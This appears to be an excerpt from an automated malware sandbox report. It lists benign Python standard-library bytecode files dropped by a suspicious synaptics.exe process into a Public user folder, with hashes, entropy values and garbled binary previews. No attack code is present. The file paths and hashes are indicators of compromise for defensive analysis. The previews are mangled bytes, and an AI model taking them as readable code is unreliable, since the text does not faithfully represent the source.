                                                                                                                                                                                      Preview:o........'-d.........................@...s\...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.g.Z.G.d.d...d.e...Z.G.d.d...d...Z.e.d.k.r,e.e.......d.S.d.S.).z-An object-oriented interface to .netrc files......N..netrc..NetrcParseErrorc....................@...s"...e.Z.d.Z.d.Z.d.d.d...Z.d.d...Z.d.S.).r....z5Exception raised on syntax errors in the .netrc file.Nc....................C...s"...|.|._.|.|._.|.|._.t...|.|.....d.S...N)...filename..lineno..msg..Exception..__init__)...selfr....r....r......r.....)C:\Users\Public\QExvbmVOb25l\lib\netrc.pyr........s............z.NetrcParseError.__init__c....................C...s....d.|.j.|.j.|.j.f...S.).Nz.%s (%s, line %s)).r....r....r....).r....r....r....r......__str__....s......z.NetrcParseError.__str__).NN)...__name__..__module__..__qualname__..__doc__r....r....r....r....r....r....r........s............c....................@...s....e.Z.d.Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.).r....Nc....................C...s....|.d.u.}.|.d.u.r.t.j...t.j...d...d...}.i.|._.i.|._.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):15316
                                                                                                                                                                                      Entropy (8bit):5.432888374451387
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:H7fr8V5t+X9xyFga+mDB8s+qHe65jZBCrF++umt:zra/WkFga+mDGs+hsZwrF++umt
                                                                                                                                                                                      MD5:0F8E4B2E2CB1397CCD71C4EB289956F1
                                                                                                                                                                                      SHA1:748BFEB3058F7C372076F0CF0DB9B8E8B2CAABBF
                                                                                                                                                                                      SHA-256:7113CC19BEC27EF04C4399726A6C2C091F14F6FAAA17F08B783F917969259136
                                                                                                                                                                                      SHA-512:0E66B08CD8388FD5B168BA76BD506D1A5EC0E33EC0614ADC69120CB5CF815163ADEBC1DD17F9CB842CBB3136FD18C873C14B0702B325AE1DF7A3C2F2CB3C4D2E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-dov.......................@...s....d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.T.g.d...Z.d.d...Z.z.d.d.l.m.Z.m.Z.m.Z...d.d...Z.W.n...e.yK......d.d...Z.Y.n.w.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.j.j.e._.d.d...Z.d.d...Z.d d!..Z d"d#..Z!z.d.d$l"m#Z#..W.n...e.y.......d.Z#Y.n.w.d%d&..Z$d'd(..Z%d)d*..Z&d+d,..Z'd-d...Z(z.d.d/l"m)Z)..W.n...e.y.......e(Z*Y.n.w.d0d1..Z*z.d.d2l"m+Z+m,Z-..W.n...e.y.......e*Z.Y.n.w.d3d4..Z/d5d6..Z0d7d8..d9d:..Z.e1e.d;..o.e..2..d<..d=k.Z3dCd>d?..Z4d@dA..Z5z.d.dBl"m6Z7..W.d.S...e...y.......Y.d.S.w.)Dz.Common pathname manipulations, WindowsNT/95 version...Instead of importing this module directly, import os and refer to this.module as os.path...........\..;../z..;C:\binZ.nul.....N)...*)&..normcase..isabs..join..splitdrive..split..splitext..basename..dirnameZ.commonprefixZ.getsizeZ.getmtimeZ.getatimeZ.getctime..islink..exists..lexists..isdir..isfile..ismount..expanduser..expandvars..normpath..abspath..curdir..pardir..sep..p
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1760
                                                                                                                                                                                      Entropy (8bit):5.538011062591141
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:k5kKoXsYZdrK2ESp8ItqhhhUIuoLpP0I2GIikGmObMn:khoP27OqhDaodpkwbMn
                                                                                                                                                                                      MD5:81520F63E7DF46A697FEE0536AA837B5
                                                                                                                                                                                      SHA1:CD0FB6EE01CAE81DAF3043BC4A227AD734EB39AD
                                                                                                                                                                                      SHA-256:0F5CC130E8A14F2EDB9FEA8F3BAA237E8BC82179DE62EDD8642A78F62D99E5A9
                                                                                                                                                                                      SHA-512:28623B981EC47A82691757C1CD5706CCFE42386094BFC546681FDEDC371E9C6F91A989006FF7866EDBA6433AA9217BD7FDF4F86B03F3804DBAFBA3AB720D8DA0
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s....d.Z.d.d...Z.d.d...Z.d.S.).z.Convert a NT pathname to a file URL and vice versa...This module only exists to provide OS-specific code.for urllib.requests, thus do not use directly..c....................C...s....d.d.l.}.d.d.l.}.|...d.d...}.d.|.v.r.|.d.d.....d.k.r |.d.d.....}.|...d...}.|.j...d...|.....S.|...d...}.t.|...d.k.sB|.d...d...|.j.v.rJd.|...}.t.|.....|.d...d.......}.|.d.....d...}.|.d...}.|.D.].}.|.rm|.d...|.j...|.....}.q_|...d...r||...d...r||.d.7.}.|.S.).z{OS-specific conversion from a relative URL of the 'file' scheme. to a file system path; not recommended for general use......N..:..|.....z.////......./..\.....z.Bad URL: .....)...string..urllib.parse..replace..split..parse..unquote..join..len..ascii_letters..OSError..upper..endswith)...urlr......urllib..components..comp..error..drive..path..r......C:\Users\Public\QExvbmVOb25l\lib\nturl2path.py..url2pathname....s*.............................................r....c..................
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5460
                                                                                                                                                                                      Entropy (8bit):5.65097332605992
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:ksgyb2Y4AiIw0UEDJdWz1NA/DFi1foNC3SdGCDO1WnOhf:sySYRRDXfk1fb3H3WnOhf
                                                                                                                                                                                      MD5:A1F717CA67735A72710BD3439E9955CF
                                                                                                                                                                                      SHA1:8EE5BE0608514136D154D43AF6664B8B3B1E0459
                                                                                                                                                                                      SHA-256:416E2820E3BCF8080A5E875AA12A44AE14811B96838AC510213F3EC87A7A632B
                                                                                                                                                                                      SHA-512:07010B285348A2DCA17415F52660D9DD14C86D3999436DF8C569FB3395B1A75BAC41C67EB752222271D6931E2CEA01F5086D344255D4177B3FBA6E90AD8F5928
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s"...d.Z.g.d...Z.z.d.d.l.m.Z...e...d.....W.n...e.y.......Y.n.w.d.Z.g.Z.g.Z.g.Z.g.Z.g.Z.g.Z.g.Z.g.Z.i.Z.d.d...e.d...D...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.d.d ....e.d!d"....e.d#d$....e.d%d&....e.d'd(....e.d)d*....e.d+d,....e.d-d.....e.d/d0....e.d1d2....e.d3d4....e.d5d6....e.d7d8....e.d9d:....e.d;d<....e.d=d>....e.d?d@....e.dAdB....e.dCdD....e.dEdF....e.dGdH....e.dIdJ....e.dKdL....e.dMdN....e.dOdP....e.dQdR....e.dSdT....e.dUdV....e.dWdX....e.dYdZ....e.d[d\....e.d]d^....e.d_d`....e.dadb....e.dcdd....e.dedf....e.dgdh....e.didj....e.dkdl....e.dmdn....e.dodp....e.dqdr....e.dsdt....e.dudv....e.dwdx....e.dydz....e.d{d|....e.d}d~....e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.d.d.....d.Z.e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.d.d.....e...d.....e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):13521
                                                                                                                                                                                      Entropy (8bit):4.8472579053762095
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:+25I4L+Hse0C1/u2/DqnsvQgZ2CsisKoVk7tlipYMpA+B8eLq4UZfm:N5FeTs2rwejZ2CMKoqt0pYkTSeLAfm
                                                                                                                                                                                      MD5:E2BA5911F122B550E81AC86DDDA18323
                                                                                                                                                                                      SHA1:5085ADF53848BC58EDF161DBA1236A08ACF18A9D
                                                                                                                                                                                      SHA-256:51EDAB5A122589B0B38AB0019101C85618BDC1C23510EA8C69436BD69482A292
                                                                                                                                                                                      SHA-512:0B60C4E44E3E0AE284B8A400F35AD8B0E2C64B3318D7B38D96969BA593BF72DB64A1F392380AED49288B422C718033718ED64662A0D74157592F40D26D36DA2E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.+.......................@...s....d.Z.g.d...Z.d.d.l.m.Z...d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d d!..Z.d"d#..Z.e.Z.d$d%..Z.d&d'..Z.d(d)..Z.d*d+..Z.d,d-..Z.d.d/..Z.d0d1..Z.d2d3..Z.d4d5..Z.d6d7..Z.d8d9..Z.d:d;..Z d<d=..Z!d>d?..Z"d@dA..Z#dBdC..Z$dDdE..Z%dFdG..Z&dHdI..Z'dqdJdK..Z(G.dLdM..dM..Z)G.dNdO..dO..Z*G.dPdQ..dQ..Z+dRdS..Z,dTdU..Z-dVdW..Z.dXdY..Z/dZd[..Z0d\d]..Z1d^d_..Z2d`da..Z3dbdc..Z4ddde..Z5dfdg..Z6dhdi..Z7djdk..Z8dldm..Z9z.d.dnl:T.W.n...e;y.......Y.n.w.d.dol:m.Z...e.Z<e.Z=e.Z>e.Z?e.Z@e.ZAe.ZBe.ZCe.ZDe.ZEe.ZFe.ZGe.ZHe.ZIe.ZJe.ZKe.ZLe.ZMe.ZNe.ZOe.ZPe.ZQe.ZRe.ZSe.ZTe ZUe!ZVe"ZWe$ZXe%ZYe'ZZe,Z[e-Z\e.Z]e/Z^e0Z_e1Z`e2Zae3Zbe4Zce5Zde6Zee7Zfe8Zge9ZhdpS.)ras....Operator Interface..This module exports a set of functions corresponding to the intrinsic.operators of Python. For example, operator.add(x, y) is equivalent.to the expression x+y. The function names are those used for special.methods; variants
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):31612
                                                                                                                                                                                      Entropy (8bit):5.452333319472934
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:mZz401oaK+W0l85fOHqjQmZxhVQIuA5+LBL3L8LOULOLwvLdLtg4aE2aYiZ9:QbK+WHaKQmZBw2LN2Y
                                                                                                                                                                                      MD5:05C6AD7B193923DA42B23DE4C5D27502
                                                                                                                                                                                      SHA1:C729C38E7BC62983418230B605AE4A041C0A9456
                                                                                                                                                                                      SHA-256:6D359A390187883352FC1A84986B3437E4FCA870A5DC48E86E0421A5651E035D
                                                                                                                                                                                      SHA-512:FBFB81DCEC893FDAC516DE1839D891476C6BA149224983732DB857FC612707F65FBC5372DCEC911B7046CACEDA5DEC687D08D20182992B340D3B2A63B9832A25
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d........................@...sh...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...e.e.e.....Z.e.j.Z.g.d...Z.d.d...Z.d.d...Z.d.e.v.rod.Z.d.Z.d.d.l.T.z.d.d.l.m.Z...e...d.....W.n...e.yK......Y.n.w.d.d.l.Z.z.d.d.l.m.Z...W.n...e.ya......Y.n.w.d.d.l.Z.e...e.e.......[.nId.e.v.r.d.Z.d.Z.d.d.l.T.z.d.d.l.m.Z...e...d.....W.n...e.y.......Y.n.w.d.d.l.Z.d.d.l.Z.e...e.e.......[.z.d.d.l.m.Z...W.n...e.y.......Y.n.w.e.d.....e.e.j.d.<.d.d.l.m.Z.m.Z.m Z m!Z!m"Z"m#Z#m$Z$m%Z%..[.e.d.....r.e&..Z'd.d...Z(e)..Z*e(d.d.....e(d.d.....e(d.d.....e(d.d.....e(d.d ....e(d!d"....e(d#d$....e(d%d&....e(d'd(....e(d)d*....e(d+d,....e(d-d.....e(d/d0....e(d1d2....e(d1d3....e(d4d ....e*Z+e)..Z*e(d.d.....e*Z,e)..Z*e(d5d6....e(d7d.....e(d8d.....e(d9d:....e(d9d;....e(d<d=....e*.-e.....e(d>d?....e(d@d ....e(dAd ....e(dBdC....e.dD....r.e.dE....r.e(dFdD....e*Z.e)..Z*e(d.d.....e(d.d.....e(d.d.....e(dGdH....e(dId.....e.dJ....r.e(dKd.....e(d!d"....e(dLd ....e(dMd.....e(d.d.....e(d4d ....e(dNd.....e*Z/[*[.['[(d.Z0dOZ1dPZ2d.dSdT..Z3
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):42065
                                                                                                                                                                                      Entropy (8bit):5.237215862260339
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:e8Hqw6LgaOSKyzD3ZslxWCPnN3v5HgAgRDTMJ68UH73dT0Lwp4oMcce2A6VJSWm+:rKw6LL3MvPnN3v5HgAmDTMK7N8wpjMiS
                                                                                                                                                                                      MD5:DDBAF4AA9239C4EE7B6AC95E231486FE
                                                                                                                                                                                      SHA1:EAB663B54E29D079505DD2654A22F548FC19956C
                                                                                                                                                                                      SHA-256:A27A883599C053F23B71915B54ABFFB0BA054B0533EEB6C645FC3EA291500373
                                                                                                                                                                                      SHA-512:2438F39E08474381B2A1E9E65CED1E832FFBA584B5C1FE533CA5342F98873DB614A7CDAEF5A594506E4512A9AA25671DB8DE97B9D825F03A88500D23383CE169
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d\........................@...s4...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...g.d...Z.d.Z.d.Z d.Z!e.e.e.e.f.Z"e.e e!f.Z#d.d...Z$d.d...Z%G.d.d...d.e&..Z'G.d.d...d.e'..Z(G.d.d...d.e'..Z)e(..Z*e)..Z+G.d.d...d...Z,G.d.d...d.e,..Z-e-..Z.d.d...Z/e0e.d...r.e..1..e/..Z/G.d.d...d...Z2G.d.d...d...Z3G.d d!..d!e2..Z4G.d"d#..d#e2..Z5G.d$d%..d%e2..Z6G.d&d'..d'e...Z7G.d(d)..d)e&..Z8e.j9.:e8....G.d*d+..d+e8..Z;G.d,d-..d-e8..Z<G.d.d/..d/e8..Z=G.d0d1..d1e=e;..Z>G.d2d3..d3e=e<..Z?d.S.)4.....N)...Sequence)...EINVAL..ENOENT..ENOTDIR..EBADF..ELOOP)...attrgetter)...S_ISDIR..S_ISLNK..S_ISREG..S_ISSOCK..S_ISBLK..S_ISCHR..S_ISFIFO)...quote_from_bytes)...PurePath..PurePosixPath..PureWindowsPath..Path..PosixPath..WindowsPath......{...i....c....................C...s ...t.|.d.d...t.v.p.t.|.d.d...t.v.S.).N..errno..winerror)...getattr.._IGNORED_ERROS.._IGNORED_WINERRORS)...except
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):27442
                                                                                                                                                                                      Entropy (8bit):5.5904468658757756
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:fB4j93Ho+Dvz6WYt08jHUgRyRj4/ISTvI9nI6xk4laOXN4Ww:fB293oEbq089oRjnuunI6xs64F
                                                                                                                                                                                      MD5:9C44045E27B703DD587BA21D5F1AB6E8
                                                                                                                                                                                      SHA1:64B2BECA35332487D8808CAD39A3CC2B4056F41E
                                                                                                                                                                                      SHA-256:6FC6D0204E0E7C651F37DBD5856691A8F97C5DC28A0D97B7F8789A095813E60F
                                                                                                                                                                                      SHA-512:81232D31A22D42B2CF9CBD4FB7463AE61882F3C05B83D4FA9F9FF83ACBAA2636D5B5FBBE0966C60E73236E037EB6E83C1B582A7E89547F0C1FD5C427D2172433
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-dH........................@...s....d.Z.d.Z.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.d.d.d.d.d.d.d.d.d...Z.e...d...Z.d.d...Z.e...d.e.j...Z.d.d.d...Z.d.d.d...Z.e...d...Z.....d.d.d...Z.d.d.d.d.d.d.d d!d"d#d$d%..Z.d.d&d'd(d)d*d+..Z.d,d-..Z.d.d/..Z.d.d0d1..Z.d2d3..Z.d.d5d6..Z.d7d8..Z.d.d9d:..Z.d;d<..Z.d=d>..Z.d.d?d@..Z.dAdB..Z d.dCdD..Z!dEdFdGd...Z"e.j#d.d.f.dHdI..Z$dJdK..Z%G.dLdM..dM..Z&dNdO..Z'G.dPdQ..dQe..(dRdS....Z)d.a*dTdU..Z+dVdW..Z,dXdY..Z-dZd[..Z.d\d]..Z/d^d_..Z0d`da..Z1e...dbe.j...Z2e...dce.j...Z3e...dd..Z4e...de..Z5i.Z6d.dfdg..Z7dhdi..Z8djdk..Z9dldm..Z:dndo..Z;dpdq..Z<drds..Z=dtdu..Z>i.Z?d.dvdw..Z@e...dx..ZAe...dy..ZBdzZCd.aDd{d|..ZEd}d~..ZFeGd.k...rjd.e.jHv...pPd.e.jHv.ZId.e.jHv...o[d.e.jHv.ZJeKe@eJeI......e..Ld.....d.S.d.S.).a8... This module tries to retrieve as much platform-identifying data as. possible. It makes this information available via function APIs... If called from the command line, it prints the platform. information conca
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):10543
                                                                                                                                                                                      Entropy (8bit):5.329830288433104
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:rhb0oiAyslc6Yc5JJ0kMz8g1z37oItrg2spGuDbTM0tNWCEZC:rhGALlTYc5JJ5Itr5spLbo0bdEZC
                                                                                                                                                                                      MD5:ED7B716AC49D014F45DB67389B884E17
                                                                                                                                                                                      SHA1:84BE6DCFFB42D7D23DDB93508F72711B7B1039B6
                                                                                                                                                                                      SHA-256:561092F9C0742C62FC028AEA5367683355F0C3ACDE2B82EEE391744791944779
                                                                                                                                                                                      SHA-512:39E8AAEE5B0E976D264FA65225164695F2C86C2A00C697A11D8D2ABDD24C77FB1C59FC77EF75118A8DCE351C2F43F5B2C9844C676802394635A94AA011E20609
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.A.......................@...s....d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.T.g.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.j.j.e._.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d ..Z.d!d"..Z.d#d$..Z.d.a.d.a.d%d&..Z.d'd(..Z.d)d*..Z d+d,..d-d...Z!d/d0..Z"e.j#d1k.Z$d6d2d3..Z%d4d5..Z&d.S.)7a....Common operations on Posix pathnames...Instead of importing this module directly, import os and refer to.this module as os.path. The "os.path" name is an alias for this.module on Posix systems; on other systems (e.g. Windows),.os.path provides the same operations in a manner specific to that.platform, and is an alias to another module (e.g. ntpath)...Some of this can actually be useful on non-Posix systems too, e.g..for manipulation of the pathname component of URLs.........../..:z./bin:/usr/binNz./dev/null.....)...*)&..normcase..isabs..join..splitdrive..split..splitext..basename..dirname..commonprefix..getsize..getmtime..getatime..getctime..islink..exis
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):10805
                                                                                                                                                                                      Entropy (8bit):5.079570093380288
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:ru+pM4yfRWdufeC/PBbEy6LWf1eR/i9Z6/cWyfmrAX/I8:i+pMrQdufd/PBbEy6LWdeo9s/PyfmrCP
                                                                                                                                                                                      MD5:C48B7CDFD1CFA56D6EF1E7AED1C7824A
                                                                                                                                                                                      SHA1:F503E6ED09B6280337E6317635098CDD140F798B
                                                                                                                                                                                      SHA-256:23816DCA459DC697D02A4AD13630DC6060F16CD531425D91AF2AB09D83D13D1E
                                                                                                                                                                                      SHA-512:3C3972010B9218403909383BDD8852BEFDC6F49036EAFE16FD4D0CF46454FC443D51F24351D95D2C8821E162D26BD682EF8C78EF4836FB292D015FAD102D58C9
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...z.d.d.l.m.Z...W.n...e.y1......d.Z.Y.n.w.g.d...Z.z.d.d.l.m.Z...W.n...e.yO......G.d.d...d.e...Z.Y.n.w.G.d.d...d.e...Z.G.d.d...d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d...Z.e.d.u.r~e.Z.d.S.d.S.).z'A multi-producer, multi-consumer queue......N)...deque)...heappush..heappop)...monotonic)...SimpleQueue)...Empty..Full..Queue..PriorityQueue..LifoQueuer....).r....c....................@........e.Z.d.Z.d.Z.d.S.).r....z4Exception raised by Queue.get(block=0)/get_nowait().N....__name__..__module__..__qualname__..__doc__..r....r.....)C:\Users\Public\QExvbmVOb25l\lib\queue.pyr...................r....c....................@...r....).r....z4Exception raised by Queue.put(block=0)/put_nowait().Nr....r....r....r....r....r........r....r....c....................@...s....e.Z.d.Z.d.Z.d!d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d"d.d...Z.d"d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d ..Z.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5807
                                                                                                                                                                                      Entropy (8bit):5.454657646690387
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:kPp0xXxswv10Es2XWFP0nf5nizGJFNYTBTO7u10IbJJs5WkbtL4FRJpGyd/8tzOR:oqrswv2EGmxMGb+rIWkOFldkS
                                                                                                                                                                                      MD5:F93690DDE4BBA5A88DFFF80E29BD0AA5
                                                                                                                                                                                      SHA1:0859E3843F413E73E1DB95CC20DC272D99613E83
                                                                                                                                                                                      SHA-256:28D2B449A3FD21FB428B6B428D3B1CFC345BAAB8B9516D4818BEA30CC66C2AA9
                                                                                                                                                                                      SHA-512:A300CFAEF4EF83AD81511A9DC1C9A2480C742E9D1231CB20BFA73765587419CBB636DFBEE014D7B1DB87C2006F410F5EC14B502E48AA70D1C065BA258299F06B
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-dV........................@...s....d.Z.g.d...Z.d.Z.d.Z.d.Z.d.Z.z.d.d.l.m.Z.m.Z...W.n...e.y%......d.Z.d.Z.Y.n.w.d.d...Z.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.d.k.rWe.....d.S.d.S.).zHConversions to/from quoted-printable transport encoding as per RFC 1521.)...encode..decode..encodestring..decodestring.....=.L...s....0123456789ABCDEF..........)...a2b_qp..b2a_qpNc....................C...sH...t.|.t...s.J...|.d.v.r.|.S.|.d.k.r.|.S.|.t.k.p#d.|.....k.o d.k.n.......S.).z.Decide whether a particular byte ordinal needs to be quoted... The 'quotetabs' flag indicates whether embedded tabs and spaces should be. quoted. Note that line-ending tabs and spaces are always encoded, as per. RFC 1521.. ..... ......_..... .....~)...isinstance..bytes..ESCAPE)...c..quotetabs..header..r.....*C:\Users\Public\QExvbmVOb25l\lib\quopri.py..needsquoting....s..............".r....c....................C...sB...t.|.t...r.t.|...d.k.s.J...t.|...}.t.t.t.|.d.....t.|.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):22761
                                                                                                                                                                                      Entropy (8bit):5.437346660850303
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:g151Eqqa1srwKCiPSFSU2hf9xjTW8tCX21XiF+2YSNJWQhkYM+CS:gzJKZCiRTLCX2B1UJWbYVCS
                                                                                                                                                                                      MD5:38B08542E21CD53FA1EDB606205C6669
                                                                                                                                                                                      SHA1:DE389E58E3865457046E40A92B6543C4711E6A43
                                                                                                                                                                                      SHA-256:E06D9AE871FA5F1D04671DFE5BF7ACF380F79DA78319447CC17A9CBDFEB561C8
                                                                                                                                                                                      SHA-512:05D245CD7E3FE449EE17F65CA013C466A06319AAF7F45F34D3CA2133C58AA505557326B3C7347B0C1C0E8EA2E62903A45134C649DB58E384564E10B88FF87DDA
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-dg........................@...s....d.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l m!Z"m#Z$..d.d.l%m&Z'..d.d.l(m)Z*m+Z,..d.d.l-m-Z...d.d.l.Z/d.d.l0Z0z.d.d.l1m2Z1..W.n...e3ym......d.d.l4m2Z1..Y.n.w.g.d...Z5d.e.d.....e.d.....Z6e.d...Z7d.e.d.....Z8d.Z9d.e9....Z:d.Z;G.d.d...d.e0j<..Z<G.d.d...d.e<..Z=e<..Z>e>j?Z?e>j@Z@e>jAZAe>jBZBe>jCZCe>jDZDe>jEZEe>jFZFe>jGZGe>jHZHe>jIZIe>jJZJe>jKZKe>jLZLe>jMZMe>jNZNe>jOZOe>jPZPe>jQZQe>jRZRe>jSZSe>jTZTe>jUZUd.d...ZVd#d.d...ZWeXe/d ..r.e/jYe>j?d!....eZd"k...r.eW....d.S.d.S.)$a....Random variable generators... bytes. -----. uniform bytes (values between 0 and 255).. integers. --------. uniform within range.. sequences. ---------. pick random element. pick random sample. pick weighted random sample. generate random permutation.. distributions on the real line:. ------------------------------. unifor
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):14240
                                                                                                                                                                                      Entropy (8bit):5.2132795076047325
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:EuPJsiNrHyou2OkRFvMKUryx95qoxS6MbZ:ECJssrSoVfRAry/5qoU6MbZ
                                                                                                                                                                                      MD5:39DCC135326C030CE0AF09FBE82CE3F4
                                                                                                                                                                                      SHA1:5B15DD97469A1D797C06C477EC03519ACF4E9DC5
                                                                                                                                                                                      SHA-256:6EAFAAFB0E609BA8A61F4C70CF6D2EE615ED1FD0DDBC10961ED52E17A80073C9
                                                                                                                                                                                      SHA-512:D30EBAA41C6D6F42E53C3DAD609425B90DF2517D26F2C8B07B9EC3BB6456E9F101D858E2428995791AF5CCB9E41405AFEBA173EC561A378F1593F8BF5470A88C
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
